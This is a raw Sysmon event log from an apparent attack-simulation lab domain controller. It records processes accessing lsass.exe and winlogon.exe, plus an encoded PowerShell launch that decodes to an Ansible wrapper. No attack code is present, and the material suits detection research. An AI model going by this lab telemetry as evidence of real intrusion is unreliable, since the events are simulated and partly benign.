10341000x80000000000000005821Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0C00-000000009101}596C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005820Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0C00-000000009101}596C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005819Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005818Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005817Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0900-000000009101}784C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005816Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0900-000000009101}784C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005815Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.266{10ACEC4A-85A6-5FCF-F000-000000009101}48361104C:\Windows\system32\conhost.exe{10ACEC4A-85A6-5FCF-F300-000000009101}4636C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005814Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.266{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005813Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.266{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005812Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.266{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005811Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.266{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005810Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.266{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005809Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.266{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005808Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.266{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005807Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.266{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005806Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.266{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005805Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.266{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-85A6-5FCF-F300-000000009101}4636C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005804Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.266{10ACEC4A-85A6-5FCF-F200-000000009101}7484116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-85A6-5FCF-F300-000000009101}4636C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66672516(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b13120(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b12df1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+665c46d6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65ad3987(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b31e56(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b154bb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b154bb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b1534c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b072d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b13804(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b133f7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b13120(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b12df1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+665c46d6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65af9c52(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65af9222(wow64) 154100x80000000000000005803Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.276{10ACEC4A-85A6-5FCF-F300-000000009101}4636C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAaQBmACAAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAALQBsAHQAIABbAFYAZQByAHMAaQBvAG4AXQAiADMALgAwACIAKQAgAHsACgAnAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnAAoAZQB4AGkAdAAgADEACgB9AAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-85A6-5FCF-374B-090000000000}0x94b370HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{10ACEC4A-85A6-5FCF-F200-000000009101}748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBhAFEAQgBtAEEAQwBBAEEASwBBAEEAawBBAEYAQQBBAFUAdwBCAFcAQQBHAFUAQQBjAGcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEYAUQBBAFkAUQBCAGkAQQBHAHcAQQBaAFEAQQB1AEEARgBBAEEAVQB3AEIAVwBBAEcAVQBBAGMAZwBCAHoAQQBHAGsAQQBiAHcAQgB1AEEAQwBBAEEATABRAEIAcwBBAEgAUQBBAEkAQQBCAGIAQQBGAFkAQQBaAFEAQgB5AEEASABNAEEAYQBRAEIAdgBBAEcANABBAFgAUQBBAGkAQQBEAE0AQQBMAGcAQQB3AEEAQwBJAEEASwBRAEEAZwBBAEgAcwBBAEMAZwBBAG4AQQBIAHMAQQBJAGcAQgBtAEEARwBFAEEAYQBRAEIAcwBBAEcAVQBBAFoAQQBBAGkAQQBEAG8AQQBkAEEAQgB5AEEASABVAEEAWgBRAEEAcwBBAEMASQBBAGIAUQBCAHoAQQBHAGMAQQBJAGcAQQA2AEEAQwBJAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBnAEEASABJAEEAWgBRAEIAeABBAEgAVQBBAGEAUQBCAHkAQQBHAFUAQQBjAHcAQQBnAEEARgBBAEEAYgB3AEIAMwBBAEcAVQBBAGMAZwBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEASQBBAEIAMgBBAEQATQBBAEwAZwBBAHcAQQBDAEEAQQBiAHcAQgB5AEEAQwBBAEEAYgBnAEIAbABBAEgAYwBBAFoAUQBCAHkAQQBDAEkAQQBmAFEAQQBuAEEAQQBvAEEAWgBRAEIANABBAEcAawBBAGQAQQBBAGcAQQBEAEUAQQBDAGcAQgA5AEEAQQBvAEEASgBBAEIAbABBAEgAZwBBAFoAUQBCAGoAQQBGADgAQQBkAHcAQgB5AEEARwBFAEEAYwBBAEIAdwBBAEcAVQBBAGMAZwBCAGYAQQBIAE0AQQBkAEEAQgB5AEEAQwBBAEEAUABRAEEAZwBBAEMAUQBBAGEAUQBCAHUAQQBIAEEAQQBkAFEAQgAwAEEAQwBBAEEAZgBBAEEAZwBBAEUAOABBAGQAUQBCADAAQQBDADAAQQBVAHcAQgAwAEEASABJA